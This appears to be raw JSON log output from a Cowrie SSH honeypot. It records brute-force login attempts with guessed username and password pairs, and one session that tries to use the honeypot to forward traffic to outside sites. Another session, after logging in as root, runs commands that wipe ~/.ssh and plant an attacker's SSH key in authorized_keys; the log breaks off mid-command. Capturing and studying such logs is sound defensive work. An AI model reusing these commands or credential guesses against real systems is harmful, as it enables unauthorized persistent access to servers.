{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48226,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb05a2c9be2c","protocol":"ssh","message":"New connection: 212.227.235.229:48226 (1.2.3.4:22) [session: cb05a2c9be2c]","sensor":"my-vps","timestamp":"2025-08-31T01:24:03.011478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:24:03.829764Z","src_ip":"212.227.235.229","session":"cb05a2c9be2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:24:03.830967Z","src_ip":"212.227.235.229","session":"cb05a2c9be2c"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345","message":"login attempt [developer/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:24:10.082010Z","src_ip":"212.227.235.229","session":"cb05a2c9be2c"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:24:12.245600Z","src_ip":"212.227.235.229","session":"cb05a2c9be2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e91fcf68069","protocol":"ssh","message":"New connection: 212.227.125.160:38778 (1.2.3.4:22) [session: 8e91fcf68069]","sensor":"my-vps","timestamp":"2025-08-31T01:24:25.836709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:24:26.283409Z","src_ip":"212.227.125.160","session":"8e91fcf68069"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:24:26.284080Z","src_ip":"212.227.125.160","session":"8e91fcf68069"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345","message":"login attempt [developer/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:24:28.736195Z","src_ip":"212.227.125.160","session":"8e91fcf68069"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:24:30.400252Z","src_ip":"212.227.125.160","session":"8e91fcf68069"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37477,"dst_ip":"1.2.3.4","dst_port":22,"session":"198fc2dda52d","protocol":"ssh","message":"New connection: 77.83.207.83:37477 (1.2.3.4:22) [session: 198fc2dda52d]","sensor":"my-vps","timestamp":"2025-08-31T01:24:34.739352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:24:34.740776Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T01:24:34.793115Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.052253Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14924,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14924","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.105085Z","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.157101Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14503,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14503","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.302501Z","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.354484Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23990,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23990","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.502434Z","session":"198fc2dda52d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.554465Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:24:35.607317Z","src_ip":"77.83.207.83","session":"198fc2dda52d"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33485,"dst_ip":"1.2.3.4","dst_port":22,"session":"fca075cf6853","protocol":"ssh","message":"New connection: 102.88.137.80:33485 (1.2.3.4:22) [session: fca075cf6853]","sensor":"my-vps","timestamp":"2025-08-31T01:24:43.404351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:24:43.405270Z","src_ip":"102.88.137.80","session":"fca075cf6853"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:24:43.534504Z","src_ip":"102.88.137.80","session":"fca075cf6853"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"mine","message":"login attempt [minecraft/mine] failed","sensor":"my-vps","timestamp":"2025-08-31T01:24:44.094321Z","src_ip":"102.88.137.80","session":"fca075cf6853"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:24:45.226966Z","src_ip":"102.88.137.80","session":"fca075cf6853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58394,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0dc86526c56","protocol":"ssh","message":"New connection: 212.227.235.229:58394 (1.2.3.4:22) [session: d0dc86526c56]","sensor":"my-vps","timestamp":"2025-08-31T01:25:06.270459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:25:07.944733Z","src_ip":"212.227.235.229","session":"d0dc86526c56"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:25:07.945678Z","src_ip":"212.227.235.229","session":"d0dc86526c56"}
{"eventid":"cowrie.login.failed","username":"developer","password":"1234567","message":"login attempt [developer/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:25:12.767705Z","src_ip":"212.227.235.229","session":"d0dc86526c56"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:25:14.894711Z","src_ip":"212.227.235.229","session":"d0dc86526c56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49954,"dst_ip":"1.2.3.4","dst_port":22,"session":"5438bf2d79eb","protocol":"ssh","message":"New connection: 212.227.125.160:49954 (1.2.3.4:22) [session: 5438bf2d79eb]","sensor":"my-vps","timestamp":"2025-08-31T01:25:29.149777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:25:29.759893Z","src_ip":"212.227.125.160","session":"5438bf2d79eb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:25:29.760725Z","src_ip":"212.227.125.160","session":"5438bf2d79eb"}
{"eventid":"cowrie.login.failed","username":"developer","password":"1234567","message":"login attempt [developer/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:25:32.164719Z","src_ip":"212.227.125.160","session":"5438bf2d79eb"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:25:33.668471Z","src_ip":"212.227.125.160","session":"5438bf2d79eb"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":47472,"dst_ip":"1.2.3.4","dst_port":22,"session":"35babb552f61","protocol":"ssh","message":"New connection: 115.190.94.119:47472 (1.2.3.4:22) [session: 35babb552f61]","sensor":"my-vps","timestamp":"2025-08-31T01:25:40.808030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:25:40.808707Z","src_ip":"115.190.94.119","session":"35babb552f61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:25:41.017265Z","src_ip":"115.190.94.119","session":"35babb552f61"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17544,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d6382e4926f","protocol":"ssh","message":"New connection: 102.88.137.80:17544 (1.2.3.4:22) [session: 9d6382e4926f]","sensor":"my-vps","timestamp":"2025-08-31T01:25:57.509065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:25:57.509943Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:25:57.639665Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.login.success","username":"root","password":"123.com.cn","message":"login attempt [root/123.com.cn] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:25:58.203228Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:25:58.477619Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:25:58.478332Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:25:58.479177Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:25:58.609824Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:25:58.926188Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 